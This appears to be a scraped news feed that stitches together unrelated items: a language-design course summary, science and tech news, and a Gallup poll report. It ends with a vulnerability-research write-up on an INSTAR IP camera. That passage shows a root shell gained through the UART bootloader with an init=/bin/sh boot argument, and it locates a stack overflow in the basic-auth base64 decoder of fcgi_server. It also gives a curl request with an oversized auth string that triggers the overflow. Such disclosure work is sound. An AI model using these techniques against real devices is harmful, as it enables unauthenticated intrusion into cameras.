    A syntax that looks sweet and natural language-like that appears good but turns out to be bad for you.

  15. What is a golfing language?

    A language designed to be as terse as possible, often for the purpose of helping you win shortest-possible code challenges.

  16. What are some examples of golfing languages?

    CJam, Pyth, Stax, GolfScript, 05Ab1E

  17. What are three styles of programming language definition?

    Informal, formal, and executable

  18. What is the difference between syntax and semantics?

    Syntax deals with program structure. Semantics deals with program meaning.

  19. What is the difference between a language’s statics and its dynamics ?

    Statics refers to the rules that can be checked at compile time. Dynamics refers to the rules that can only be checked at run-time.

  20. What are syntax definitions generally split into lexical and phrase syntaxes?

    Lexical syntax defines how invidividual characters are grouped in to words (tokens), while phrase syntax defines how these tokens are combined to form larger structures.

  21. What is a parse tree?

    A tree that describes the syntactic structure of a program as defined by the language’s syntax.

  22. The frontier of the parse tree is the program’s __________.

    Token stream

  23. A parse tree is also called a __________.

    Concrete syntax tree

  24. What does it mean for a syntactic specificiation to be ambiguous?

    There exists at least on program that has more than one parse tree.

  25. What attributes of operators are generally used to disambiguate a syntactic specification?

    Precedence and associativity

  26. What tool is provided by the authors of the Ohm library to help you prototype a new language design?

    The Ohm Editor

  27. What was the title of Alex Warth’s dissertation?

    Experimenting with Programming Languages

  28. What are some examples of legality rules that are considered too hard to be captured in a grammar and are thus typically defined within a program’s static semantics?

    You can only use an identifier if it has been previously assigned to, all function calls must accept the proper number of arguments, the built-in identifiers cannot be assigned to, identifiers declared as functions can only be called, not used in any other context, identifiers declared as numbers cannot be called, type checking, access checking (private, public), declared identifiers must be initialized or must be read. (There are many more.)

  29. What example programming languages have been designed for this course?

    Astro, Bella, Carlos, Dax, Ekko

Summary

We’ve covered:

  • The cycle of language design phases
  • What to know before undertaking language design
  • Pointers to excellent articles and essays about language design
  • Two videos (one by Alan Kay, one by Bret Victor) on languages and language design
  • How to begin the language design process
  • Questions to ask while designing your language
  • Concepts and features to think about when sketching during design
  • Abstract Syntax
  • Concrete Syntax
  • The use of the Ohm Editor in language prototyping
  • (Formal) Language Definition
  • Brief notes on five example languages

Scientists reverse kidney damage in mice, hope for humans next

Hacker News
www.sciencedaily.com
2025-11-15 03:59:35
Comments...
Original Article

Serious injury to short-term kidney function, known as acute kidney injury (AKI), can be life-threatening and also raise the likelihood of developing permanent chronic kidney disease. AKI can occur after major stressors such as sepsis or heart surgery, and more than half of all intensive care patients experience it. No approved medications currently exist to treat this condition.

Researchers at University of Utah Health (U of U Health) have discovered that fatty molecules called ceramides initiate AKI by damaging the mitochondria that supply energy to kidney cells. By using a backup drug candidate designed to alter how ceramides are processed, the team protected mitochondrial structure and prevented kidney injury in mice.

"We completely reversed the pathology of acute kidney injury by inactivating ceramides," says Scott Summers, PhD, distinguished professor and Chair of the Department of Nutrition and Integrative Physiology in the University of Utah College of Health and senior author on the study. "We were stunned -- not only did kidney function stay normal, but the mitochondria were unscathed," Summers says. "It was truly remarkable."

The results are published in Cell Metabolism .

Ceramide spikes may serve as an early warning

Earlier studies from the Summers lab showed that ceramides can harm organs such as the heart and liver. When the researchers measured ceramides in AKI models, they found a strong connection: levels rose sharply after injury in both mice and in human urine samples.

"Ceramide levels are very elevated in kidney injury," says Rebekah Nicholson, PhD, first author on the work, who completed the research as a graduate student in nutrition and integrative physiology at U of U Health and is now a postdoctoral fellow at the Arc Institute. "They go up quickly after damage to the kidneys, and they go up in relation to the severity of the injury. The worse the kidney injury is, the higher the ceramide levels will be."

These findings indicate that urinary ceramides could act as an early biomarker for AKI, giving clinicians a tool to identify vulnerable patients, including those preparing for heart surgery, before symptoms begin. "If patients are undergoing a procedure that we know puts them at high risk of AKI, then we can better predict whether or not they're actually going to have one," Nicholson says.

Altering ceramide production protects kidney function

The team nearly eliminated kidney injury in a mouse model by modifying the genetic program that controls ceramide production. This change produced "super mice" that did not develop AKI even under conditions that typically cause severe damage.

The researchers then tested a ceramide-lowering drug candidate created by Centaurus Therapeutics, a company co-founded by Summers. Mice treated ahead of time avoided kidney injury, maintained normal kidney function, remained active, and had kidneys that appeared close to normal under the microscope. Nicholson notes that their model places extreme stress on the kidneys, making it "really remarkable that mice were protected from the injury."

"These mice looked incredible," Summers adds.

The team found that ceramides harm mitochondria, the parts of the cell responsible for energy production. Damaged mitochondria in kidney cells become distorted and function poorly. Adjusting ceramide production, whether genetically or with the drug, kept mitochondria intact and working even under strain.

Potential for future therapies targeting mitochondrial health

Summers explains that the compound used in this study is closely related to, but not identical to, the ceramide-lowering drug that has entered human clinical testing. He emphasizes that mouse results do not always predict human outcomes and that further research is needed to confirm safety.

"We're thrilled by how protective this backup compound was, but it's still preclinical," Summers says. "We need to be cautious and do our due diligence to make sure this approach is truly safe before moving it into patients."

Even so, the researchers are encouraged by the findings. If the results extend to people, the drug could potentially be administered ahead of time to individuals who face a high risk of AKI, including patients undergoing heart surgery, where about one quarter experience the condition.

Because the drug appears to work by maintaining mitochondrial health, the team believes that the approach may have relevance for other disorders linked to mitochondrial dysfunction.

"Mitochondrial problems show up in so many diseases -- heart failure, diabetes, fatty liver disease," Summers says. "So if we can truly restore mitochondrial health, the implications could be enormous."

The results are published in Cell Metabolism as "Therapeutic Remodeling of the Ceramide Backbone Prevents Kidney Injury."

Funding and disclosures

This work was supported by a NCRR Shared Instrument Grant, the Kidney Precision Medicine Project, and several branches of the National Institutes of Health, including the National Cancer Institute (P30CA042014, CA272529), the National Institute of Diabetes and Digestive and Kidney Diseases (DK115824, DK116888, DK116450, DK130296, DK108833, DK112826, 1F31DK134088 and 5T32DK091317), and the National Institute of General Medical Sciences (3R35GM131854 and 3R35GM131854-04S1). Additional support came from the Juvenile Diabetes Research Foundation (JDRF 3-SRA-2019-768-A-B and JDRF 3-SRA-2019-768-A-B to WLH), the Burroughs Wellcome Fund Postdoctoral Diversity Enrichment Program (1058616), the American Diabetes Association, the American Heart Association, the Margolis Foundation, and the University of Utah Diabetes and Metabolism Research Center. The authors state that the content is their responsibility and does not necessarily reflect the views of the National Institutes of Health.

Scott Summers and Jeremy Blitzer are co-founders and shareholders of Centaurus Therapeutics. Liping Wang is also a shareholder. DN and Blitzer are listed as inventors on US Patents 1177684, 11597715, and 11135207 licensed to Centaurus Therapeutics, Inc.

I can't recommend Grafana anymore

Hacker News
henrikgerdes.me
2025-11-15 03:58:01
Comments...
Original Article

Published: 14/11/2025
6 minute read

I can’t recommend Grafana anymore


Disclaimer: This tells my personal experiences with Grafana products. It also incudes some facts but your experience may entirely vary and I would love to here your take.


I started my work life at a small software company near my university. They develop, run websites and operate web services for multiple clients. Everyone had multiple responsibilities, and they heavily relied on interns and freshmen—which can be both bad and good.
For me it was good because I learned a lot.

At some point we needed a monitoring solution, and Zabbix didn’t fit well into the new and declarative world of containers and Docker. I was tasked to find a solution. I looked at Loki/Prometheus with Grafana and Elastic with Kibana. Elastic was a beast! Heavy, hard to run, resource-hungry, and complex, Loki and Prometheus were the perfect fit back then.

So I created a docker-compose.yaml with Loki, Prometheus and Grafana. Since they all had the internal Docker network, we required no auth between them. Grafana was only exposed over an SSH tunnel. One static scrape config and the Docker Loki log plugin later, we had our observability stack. For non-Docker logs, we used Promtail. Loki and Prometheus stayed on the same machine and all we required was a local volume mount. Load was minimal.

ℹ️ This is when I learned that you should not transform every log parameter to an label just to make it easier to select in the Grafana UI. Having a label for latency with basically limitless values will fill every disks inodes, thats just how Cortex bin-packs.

I also found out Grafana Labs has a cloud offering with a nice free tier. So I even used this for personal stuff. I had a good experience with them.

Time goes on, and I switched jobs. Now we have Kubernetes.
The Prometheus container was now switching nodes. Roming storage was a problem back then, and also our workload increased by a lot. We also needed long-term storage (13 months). So I looked around and found Thanos and Mimir.
Previous experiences with Grafana products were good, so I chose Mimir. Should be similar to Loki since both are based on Cortex. Now we didn’t really need Prometheus anymore. We were only using remote_write from Prometheus. Grafana had a solution for this. With the Grafana Agent, you can ship both logs and metrics to a remote location all in one binary. This seemed like a no-brainer.

Time goes on, and Grafana changed the Grafana Agent setup to Grafana Agent Flow Mode—some adjustments, but okay - software changes. And man, did Grafana like to change things.

They started to build their own observability platform to steal some of DataDogs customers. They created Grafana OnCall their own notification system. Not only that, but they heavily invested in Helm charts and general starter templates. Basically two commands to install the metric/log shippers and use Grafana Cloud. And even when you don’t want or can’t use Grafana Cloud, here are the Helm charts to install Mimir/Loki/Tempo. To make things even easier, let’s all put it in an umbrella chart (it renders to 6k lines in the default state). Or use their Grafana Operator to manage Grafana installs - or at least parts of it.

As many may have experienced, software maintenance shows with age.
Grafana OnCall is deprecated, and Grafana Agent and Agent Flow were deprecated within 2-3 years of their creation. Some of the easy to use Helm charts are not maintained anymore. They also deprecated Angular within Grafana and switched to React for dashboards. This broke most existing dashboards.

On the same day they deprecated the Grafana Agent, they announced Grafana Alloy. The all in one replacement. It can do Logs, Metrics, Traces (zipkin & jaeger) and OTEL. The solution for everything!
The solution kind of had a rough start and was a little buggy. But it got better over time. The Alloy Operator also entered the game because why not.

ℹ️ They choose to use their own configuration language for alloy. Something that looks like HCL. I can understand why thy didn’t want to use YAML but I’m still not a fan of this. Not everything needs their own DSL.

Happy End, right?  - Not quite
The all-in-one solution does not support everything. While Grafana built their own monitoring empire, the kube-prometheus community consistently and naturally developed. The Prometheus Operator with ServiceMonitor and PodMonitor CRDs became the defacto standards. So Alloy also supports the monitoring.coreos.com api-group CRDs, at least some parts of it. It natively works with ServiceMonitor and PodMonitor , but PrometheusRules needs extra configuration. The AlertmanagerConfig which would need to be implemented in Mimir is not supported. Because Mimir brings its own Alertmanager - at least sort of. There are version differences and small incompatibilities.

But I got it all working; now I can finally stop explaining to my boss why we need to re-structure the monitoring stack every year.

Grafana just released Mimir 3.0. They re-architected the ingestion logic for scalability, and now they use a message broker. Yes, Mimir in version 3.0 needs Apache Kafka to work.
None of the above things alone would be a reason to ditch Grafana products. Set aside the fact that they made it incredibly difficult now to find the ingestion endpoints for Grafana Cloud since they want to push users to use their new fleet-config management service. But all this together makes me uncomfortable recommending Grafana stuff.
I just don’t know what will change next.

I want stability for my monitoring; I want it boring, and that’s something Grafana is not offering.   It seems like the pace within Grafana is way too fast for many companies, and I know for a fact that that pace is partially driven by career-driven development. There are some smart people at Grafana but not every customer is smart nor has the capacity to make Grafana their priority number one. Complexity kills - we’ve seen this.

ℹ️ Don’t get me wrong. Mimir, Loki and Grafana are technically really good software products and I (mostly) still like them but it’s the way these products are managed which makes me question them.

Sometimes I wonder how I would see this if I had chosen the ELK stack at my first job. I also wonder if the OpenShift approach (kube-prometheus-stack) with Thanos for long-term storage is the most time-stable solution.   I just hope OTEL settles, gets stable and boring fast, and just lets me pick whatever I want for my backend. Because right now I’m done with monitoring. I just want to support our application and do not want to revisit the monitoring setup every x weeks, because monitoring is a necessity—not the product. At least for most companies.

Meet Reservoir – The World's Smartest Water Heater

Hacker News
www.reservoirhome.com
2025-11-15 03:50:04
Comments...
Original Article

Meet Reservoir

The world’s smartest water heater.

hot water

virtual capacity

the efficiency of gas

annual savings potential

HOW IT WORKS

Thermal Intelligence

A water heater that adapts to you.

What does the world's smartest water heater get you?

More capability in one elegant package.

Want to learn more?

Sign up for updates. Stay in the know. No spam.

EASY OPERATION

Have as much (or as little) control as you want. From anywhere.

TESTIMONIALS

First installs in Boston Metro.

ABOUT US

We believe you can have both joy and efficiency.

We are proud to be supported by:

Want to learn more?

Sign up for updates. Stay in the know. No spam.

Over-reliance on English hinders cognitive science

Hacker News
www.cell.com
2025-11-15 02:58:56
Comments...

Drop in U.S. Religiosity Among Largest in World

Portside
portside.org
2025-11-15 02:15:14
Drop in U.S. Religiosity Among Largest in World barry Fri, 11/14/2025 - 21:15 ...
Original Article

WASHINGTON, D.C. — The 17-point drop in the percentage of U.S. adults who say religion is an important part of their daily life — from 66% in 2015 to 49% today — ranks among the largest Gallup has recorded in any country over any 10-year period since 2007.

About half of Americans now say religion is not an important part of their daily life. They remain as divided on the question today as they were last year.

Such large declines in religiosity are rare. Since 2007, only 14 out of more than 160 countries in the World Poll have experienced drops of over 15 percentage points in religious importance over any 10-year period.

Only a small number of mostly wealthy nations have experienced larger losses in religiosity, including Greece from 2013-2023 (28 points), Italy from 2012-2022 (23 points), and Poland from 2013-2023 (22 points). Other countries, including Chile, Türkiye and Portugal, have seen declines similar in magnitude to the U.S. decline.


U.S. Lags Behind Global Median for Religiosity, Closes Gap With OECD

As religiosity has declined in the U.S., the gap between the U.S. and the global median has widened. The global median for religiosity has remained stable for nearly two decades, averaging 81% since 2007 and reaching 83% last year, the most current full-year data available.

At the same time, attitudes in the U.S. are drawing closer to those in other advanced economies. Across the 38 OECD (Organisation for Economic Co-operation and Development) countries in 2024, a median of 36% of adults said religion is important to their daily lives. The gap between the U.S. and the median for these countries is now narrower than at any point in Gallup’s trend.

U.S. Now Occupies Unique Spot in Global Religiosity

The long-term decline in religiosity places the U.S. in a unique position on the global religious landscape. Most countries fall into one of four patterns: high religiosity with Christian identity; high religiosity with another religious identity (often Muslim majority, although there are several countries in the Middle East where Gallup does not ask religious identity questions); low religiosity with Christian identity; or low religiosity with no religious identity.

The U.S. no longer fits neatly into any of these categories, having a medium-high Christian identity but middling religiosity. In terms of religious identity, the percentage of Americans now identifying as Christian is similar to those of Western and Northern European countries such as the United Kingdom, Germany, Finland and Denmark, nations with strong Protestant traditions. Yet religion continues to play a larger role in daily life for Americans than for people in those countries.

Conversely, the importance of religion in daily life in the U.S. resembles that of countries such as Argentina, Ireland, Poland and Italy — where Catholicism is more influential — but significantly fewer Americans now identify as Christian compared with those populations.

This marks a shift from 2008, when Gallup began consistently tracking people’s religious identity and religion’s role in daily life in most of the world. At that time, the U.S. aligned more closely with countries where religion was widely practiced and most adults identified as Christian.

Bottom Line

The steady decline in U.S. religiosity over the past decade has been evident for years. Fewer Americans identify with a religion, church attendance and membership are declining, and religion holds a less important role in people’s lives than it once did. But this analysis of World Poll data puts the decline in a wider context, showing just how large the shift has been in global terms. Since 2007, few countries have measured larger declines in religiosity.

This means the U.S. lags further behind the global median for religiosity and is drawing closer to the median for other advanced economies. The U.S. increasingly stands as an outlier: less religious than much of the world, but still more devout than most of its economic peers.

Stay up to date with the latest insights by following @Gallup on X and on Instagram .

For complete methodology and specific survey dates, please review Gallup's Country Data Set details . Learn more about how the Gallup World Poll works.

Benedict Vigers is a senior global news writer at Gallup. Benedict's primary area of expertise is in Gallup's global public opinion research via The Gallup World Poll. He has published more than 50 news articles on global public opinion, focusing on a wide range of issues and countries from around the world.

Julie Ray has been writing and editing for more than 30 years — more than 20 of them for Gallup. She analyzes and writes about Gallup's global research — with an emphasis on migration — for international clients, leaders and the media.

AI note-taking startup Fireflies was really two guys typing notes by hand

Hacker News
www.pcgamer.com
2025-11-15 02:11:43
Comments...
Original Article
An image of two characters from Final Fantasy 14 eating pizza, and looking very pleased about it.
(Image credit: Square Enix)

AI note-taking startup Fireflies received a $1 billion valuation earlier this year, after the launch of its "Talk to Fireflies" AI meeting companion app. It's an impressive feat for a company started by "two broke guys"—especially as one of its co-founders recently revealed that its AI transcription service was originally powered by both founders typing the notes out by hand.

"We charged $100 a month for an AI that was really just two guys surviving on pizza," Firefly co-founder Sam Udotong proudly declared in a LinkedIn post earlier this week (via Futurism ).

Man and humanoid robot working face to face at computers - stock illustration

(Image credit: Malte Mueller via Getty Images)

Or, y'know, provide the AI service they promised their clients they would receive. And while it's tempting to cheer on the success of two young hopefuls doing their darndest to take the principle of "fake it 'til you make it" to the extreme, a scroll through the comments reveals the potential pitfalls of declaring such a scheme.

"Sitting in someone's meeting uninvited is violation of privacy. They wanted a bot in the meeting, not an uninvited person," said automation expert Umar Aftab. "This way you sabotage trust and could incur legal implications."

Keep up to date with the most important stories and the best deals, as picked by the PC Gamer team.

"Good luck with all the lawsuits," added another. "This might read like a gritty founder hustle story," said software engineer Mauricio Idarraga. "But it's actually one of the most reckless and tone-deaf posts I've seen in a while."

As Udotong's post is now beginning to be widely reported across the interwebs, I can't imagine it'll be long before one of Fireflies' original customers reads about their now-public hoodwinking, and I doubt they'll be particularly pleased. However, some LinkedIn commenters seem to see very little wrong with Fireflies' dubious early business practices.

"Super inspirational story," says another co-founder and CEO. "Haters will always hate. And most others won't understand what it takes to build from 0-1 while trying to survive as humans. In the end, your grit paid off immensely—and you have changed the world."

Hmm, I'm not so sure about that one. Still, it's certainly got people talking, at the very least. Is there really no such thing as bad publicity? I guess we'll just have to wait and see.

Andy built his first gaming PC at the tender age of 12, when IDE cables were a thing and high resolution wasn't—and he hasn't stopped since. Now working as a hardware writer for PC Gamer, Andy spends his time jumping around the world attending product launches and trade shows, all the while reviewing every bit of PC gaming hardware he can get his hands on. You name it, if it's interesting hardware he'll write words about it, with opinions and everything.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.

The Information: Second-Gen iPhone Air Postponed Until Spring 2027, but Might Gain Second Camera

Daring Fireball
www.theinformation.com
2025-11-15 02:09:38
Wayne Ma and Qianer Liu, reporting for The Information on Tuesday (paywalled, alas, but summarized by 9to5Mac here and here): Apple has since sharply scaled back production of the first iPhone Air and delayed the release of an updated version that was meant to launch in fall 2026, The Informatio...
Original Article

Why have I been blocked?

This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

What can I do to resolve this?

You can email the site owner to let them know you were blocked. Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Show HN: A visual guide to learning Jujutsu (JJ)

Hacker News
excalidraw.com
2025-11-15 00:32:04
Comments...

Friday Squid Blogging: Pilot Whales Eat a Lot of Squid

Schneier
www.schneier.com
2025-11-14 23:33:12
Short-finned pilot wales (Globicephala macrorhynchus) eat at lot of squid: To figure out a short-finned pilot whale’s caloric intake, Gough says, the team had to combine data from a variety of sources, including movement data from short-lasting tags, daily feeding rates from satellite tags, bo...
Original Article

Short-finned pilot wales ( Globicephala macrorhynchus ) eat at lot of squid:

To figure out a short-finned pilot whale’s caloric intake, Gough says, the team had to combine data from a variety of sources, including movement data from short-lasting tags, daily feeding rates from satellite tags, body measurements collected via aerial drones, and sifting through the stomachs of unfortunate whales that ended up stranded on land.

Once the team pulled all this data together, they estimated that a typical whale will eat between 82 and 202 squid a day. To meet their energy needs, a whale will have to consume an average of 140 squid a day. Annually, that’s about 74,000 squid per whale. For all the whales in the area, that amounts to about 88,000 tons of squid eaten every year.

Research paper .

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

Tags:

Posted on November 14, 2025 at 6:33 PM 1 Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.

USDA head says 'everyone' on SNAP will now have to reapply

Hacker News
thehill.com
2025-11-14 22:44:38
Comments...

No Leak, No Problem - Bypassing ASLR with a ROP Chain to Gain RCE

Lobsters
modzero.com
2025-11-14 22:43:18
Comments...
Original Article

After my previous post on ARM exploitation, where we crafted an exploit for a known vulnerability, I decided to continue the research on a more modern IoT target. In this follow-up post, I will take you through building a considerably more complex binary exploit. We will explore the path from firmware extraction and analysis to the discovery of a previously unknown vulnerability and its exploitation. Follow along as we build an ARM ROP chain to bypass ASLR without an address leak, and achieve unauthenticated RCE.

Target Overview

I examined the IN-8401 2K+, an IP camera from the German manufacturer INSTAR. It’s a modern networked surveillance camera that exposes a web-based user interface for configuration and live view. As I later found this particular model shares its firmware with other devices from INSTAR’s 2K+ and 4K series. According to Shodan 1 there are roughly 12,000 INSTAR devices visible on the public internet.

INSTAR IN-8401 2K+ web interface

Cracking the Shell Open

Before we can meaningfully hunt for vulnerabilities, we need to gain access to the device to obtain its firmware. Access to the firmware exposes binaries, configuration files, scripts and the filesystem layout and enables both static inspection and dynamic testing. Without the firmware we’re stuck with blind fuzzing of the network interface.

It’s always a good idea to collect as much information as possible before diving into analysis mode. So I started with some reading. INSTAR provides quite an extensive documentation about its cameras and their features. I found a very interesting page titled “Restore your HD Camera after a faulty Firmware upgrade” 2 . The article explained that the camera exposes a UART interface and how it could be accessed to restore a firmware image. UART is a hardware interface used for serial communication commonly found on development boards, embedded systems, and debugging interfaces. In the documentation it looked like it’s possible to boot right into a root shell.

Although the article was written for the HD camera models, not my 2K+, I figured it might be worth a shot, since manufacturers often reuse features and components across different product versions. I removed the front part of the housing and spotted the debugging interface as shown on the wiki page.

I went ahead and attached some PCBites to the interface and connected them to a FTDI, which is a small USB-to-serial converter.

Attaching FTDI to exposed UART interface

I then plugged the FTDI into my Linux machine and connected to it. After supplying some input over the serial connection I was greeted with a login prompt, cool!

1
2
3
INSTAR login: root
Password:
Login incorrect

I tried a couple of the usual combinations like admin:admin, root:root, and so on, but had no success. The documentation explained that the boot process could be interrupted to obtain a root shell on the device’s OS. So I rebooted the camera to see if that worked.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
U-Boot 2019.04 (Oct 18 2023 - 11:38:25 +0000)

CPU:   Novatek NT @ 999 MHz
DRAM:  512 MiB
Relocation to 0x1ff3b000, Offset is 0x01f3b000 sp at 1fbf4dc0
nvt_shminfo_init:  The fdt buffer addr: 0x1fbfb8c8
ARM CA9 global timer had already been initiated
otp_init!
120MHz
otp_timing_reg= 0xff6050
 CONFIG_MEM_SIZE                =      0x20000000
 CONFIG_NVT_UIMAGE_SIZE         =      0x01900000
 CONFIG_NVT_ALL_IN_ONE_IMG_SIZE =      0x14a00000
 CONFIG_UBOOT_SDRAM_BASE        =      0x1e000000
 CONFIG_UBOOT_SDRAM_SIZE        =      0x01fc0000
 CONFIG_LINUX_SDRAM_BASE        =      0x01100000
 CONFIG_LINUX_SDRAM_SIZE        =      0x1cf00000
 CONFIG_LINUX_SDRAM_START       =      0x1c700000
[...]
phy interface: INTERNAL MII
eth_na51055
Hit any key to stop autoboot:  0
 do_nvt_boot_cmd: boot time: 1718855(us)
 [...]

As you can see there was indeed a mechanism to stop the device from autobooting. But contrary to what the documentation suggested, interrupting the boot process didn’t provide a root shell on the OS, only in the U-Boot bootloader. U-Boot (short for Universal Bootloader) is an open-source bootloader commonly used in embedded systems to initialize hardware and load the operating system or firmware during startup.

1
2
3
4
5
6
7
8
9
nvt@na51055: printenv
arch=arm
[...]
bootargs=console=ttyS0,115200 earlyprintk nvt_pst=/dev/mmcblk2p0
nvtemmcpart=0x40000@0x40000(fdt)ro,0x200000@0xc0000(uboot)ro,0x40000@0x2c0000(uenv),0x400000@0x300000(linux)ro,0x40000000@0xb00000(rootfs0),0xc000000@0x40b00000(rootfs1),0x40000000@0x4cb00000(rootfs2),0x1000000@0x8CF00000(rootfsl1),0x10000000@0x8E300000(rootfsl2),0xe6a340@0(total) root=/dev/mmcblk2p1 rootfstype=ext4 rootwait rw
bootcmd=nvt_boot
[...]
vendor=novatek
ver=U-Boot 2019.04 (Oct 18 2023 - 11:38:25 +0000)

I noticed that the Kernel boot parameters were provided by an environment variable called bootargs . I went ahead an tried the init=/bin/sh trick which tells the Kernel to start a shell instead of the init process. I updated the variable accordingly and tried to boot using nvt_boot .

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
invt@na51055: setenv bootargs "console=ttyS0,115200 earlyprintk nvt_pst=/dev/mmcblk2p0
nvtemmcpart=0x40000@0x40000(fdt)ro,0x200000@0xc0000(uboot)ro,0x40000@0x2c0000(uenv),0x400000@0x300000(linux)ro,0x40000000@0xb00000(rootfs0),0xc000000@0x40b00000(rootfs1),0x40000000@0x4cb00000(rootfs2),0x1000000@0x8CF00000(rootfsl1),0x10000000@0x8E300000(rootfsl2),0xe6a340@0(total) root=/dev/mmcblk2p1 rootfstype=ext4 rootwait rw init=/bin/sh"
nvt@na51055: nvt_boot
[...]
EXT4-fs (mmcblk2p1): recovery complete
EXT4-fs (mmcblk2p1): mounted filesystem with ordered data mode. Opts: (null)
VFS: Mounted root (ext4 filesystem) on device 179:1.
devtmpfs: mounted
Freeing unused kernel memory: 1024K
Run /bin/sh as init process
/bin/sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
/ # hostname
INSTAR

It worked. I added a new root user and rebooted the device. Now I was able to login to the device using the newly created user. I dumped the whole filesystem for analysis and as a backup so I could also restore it later, if anything went wrong along the way.

High-Level Architecture & Attack Surface

With the device unlocked and open for exploration it’s very easy to get swept away by curiosity. With the goal of finding exploitable vulnerabilities in mind it’s important to lay out something like an attack surface map first.

The web stack consisted of various components, most prominently a lighttpd web server that acted as an entry point and reverse proxy. I started by inspecting its configuration to see what it was doing. As you would expect from a reverse proxy, incoming requests were forwarded to the appropriate backend. For example, requests to files ending with .cgi were routed to the fcgi_server binary through a socket at /tmp/instt_fcgi.socket .

1
2
3
4
5
6
fastcgi.server = ( ".cgi" => ((
"bin-path" => "/home/ipc/bin/fcgi_server",
"socket" => "/tmp/instt_fcgi.socket",
"max-procs" => 1,
"check-local" => "disable"
))

I was mainly interested in finding code that was reachable without authentication. From my initial exploration I knew that there was an SQLite database file where the web interface users were stored, so the binary that performed authentication had to access this file. However, I couldn’t confirm that fcgi_server was interacting with it. I concluded another component must be involved. In the process list I noticed a process called ipc_server . I attached strace to see what it was doing and found that incoming requests for most endpoints were forwarded from fcgi_server to ipc_server via /tmp/insttv2_socket .

As an example:

1
2
3
$ curl '192.168.0.3/param.cgi?cmd=mod0&paramkey=paramvalue'
cmd="mod0";
response="204";

On ipc_server’s end:

1
recv(91, "\4cmd\0\3\5\0\0\0mod0\0\6param\0\4\32\0\0\0\tparamkey\0\3\v\0\0\0paramvalue\0\7header\0\4\25\0\0\0\3ip\0\3\f\0\0\000192.168.0.1\0", 87, 0) = 87

As you can observe, the HTTP request wasn’t forwarded as-is, it was first serialized using some type of Type–Length–Value (TLV) structure. These observations also made it clear that authentication and the core application logic reside in the ipc_server backend.

With this, I had identified two interesting targets: fcgi_server and ipc_server , both of which were reachable by an unauthenticated attacker.

Methodology

With the two main targets fcgi_server and ipc_server identified we can now focus on searching for vulnerabilities. In this section I want to quickly touch on the methods I employed for doing so.

Probably one of the most important ingredients for efficient vulnerability hunting is having a proper debugging setup in place. This allows for quickly double-checking any assumptions made during static analysis, tracing calls, and so on. I ran more or less an identical setup to the one used in the last research with a gdb server on the IP camera and a gdb client on the attacker’s machine.

For this research I primarily used two approaches: fuzzing, and a combination of static and dynamic analysis. I started off with something that I would call a very primitive way of black-box fuzzing using boofuzz 3 on collected web endpoints. I tried fuzzing through all possible parameters I had found on various endpoints to see if I could trigger a crash. Although this approach yielded CVE-2025-8761 4 , I felt like it was very inefficient as a crash of the whole system was the only thing I was able to reliably detect (more on that later).

As a secondary approach I spent quite some time on reverse engineering the two binaries fcgi_server and ipc_server . I tried to get an understanding of how things work while focusing on the usual suspects for memory corruption like bounds checking, pointer arithmetic, etc. To speed things up my process usually involved examining the decompiled binary, making assumptions, and verifying them using gdb and strace dynamically.

Vulnerability Hunting

Let’s have a look at some code. As described earlier fcgi_server acted as some sort of custom middleware that translated web requests into ipc messages. In the decompiled binary I found a dispatcher for .cgi endpoints which called certain handler functions based on the given URI.

Dispatcher function in decompiled fcgi_server binary

In most of the handler functions a similar pattern emerged. Inside each handler there was a call to the same function which looked like another dispatcher. I identified the second dispatcher as some sort of authentication handler.

Update handling function in decompiled fcgi_server binary

I assumed that the code had to extract and serialize the corresponding auth data from http requests differently, depending on the authentication mechanism used. There were several different handlers one of which I identified as the basic auth handler.

Auth handler function in decompiled fcgi_server binary

Inside the basic auth handler, there was a call to another function that looked like a custom implementation of Base64 decoding. As you might have noticed, the decompiled code contained typical C++ elements such as class methods, this pointers, and references to the C++ standard library. Most of the string-related functionality I had seen so far was therefore using C++’s standard string handling. In this case, however, I noticed a memcpy that copied the decoded Base64 result into a fixed-size buffer (516 bytes) located on the stack.

Base64 decoding function in decompiled fcgi_server binary

Without spending much more time on static analysis, I moved on to perform some dynamic testing of the basic authentication functionality. First, I needed to verify my assumption that the basic auth handler and Base64 decode function were being triggered, so I set a few breakpoints and sent a request.

1
2
3
4
5
6
7
8
9
$ curl -k https://192.168.0.3/castore.cgi -u 'A:B' -v
[...]
* Request completely sent off
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
< HTTP/2 500
< content-type: text/plain; charset=utf-8
[...]
< server: lighttpd/1.4.72

The breakpoints triggered which confirmed my assumptions so far and I got back a 500.

Then I sent another request with a very long basic auth string exceeding the 516 buffer length in the base64 decode function.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
$ curl -k https://192.168.0.3/castore.cgi -u 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:B' -v
[...]
